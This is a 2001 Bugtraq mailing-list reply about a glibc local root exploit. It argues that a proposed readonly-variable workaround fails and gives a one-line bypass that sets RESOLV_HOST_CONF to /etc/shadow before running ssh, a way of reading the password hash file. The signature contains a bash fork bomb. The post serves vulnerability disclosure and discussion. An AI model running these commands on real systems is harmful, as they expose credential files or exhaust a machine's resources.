[18594] in bugtraq
Re: Glibc Local Root Exploit
daemon@ATHENA.MIT.EDU (Michal Zalewski)
Fri Jan 12 16:51:07 2001
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.30.0101120507230.10225-100000@dione.ids.pl>
Date: Fri, 12 Jan 2001 05:08:50 +0100
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To: Digital Overdrive <digiover@dsinet.org>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <3A5CE268.E25A3CC1@dsinet.org>
On Wed, 10 Jan 2001, Digital Overdrive wrote:
> [Credits to ^herman^ in #hit2000 on ircnet]
> A temp. sollution is to place this in /etc/services:
Erm, you mean /etc/profile?
> declare -r RESOLV_HOST_CONF
>
> jan@flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
> bash: RESOLV_HOST_CONF: readonly variable
> jan@flits102-93:~$
Oooh, try that:
$ bash --norc --noprofile -c 'RESOLV_HOST_CONF=/etc/shadow ssh host'
--
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
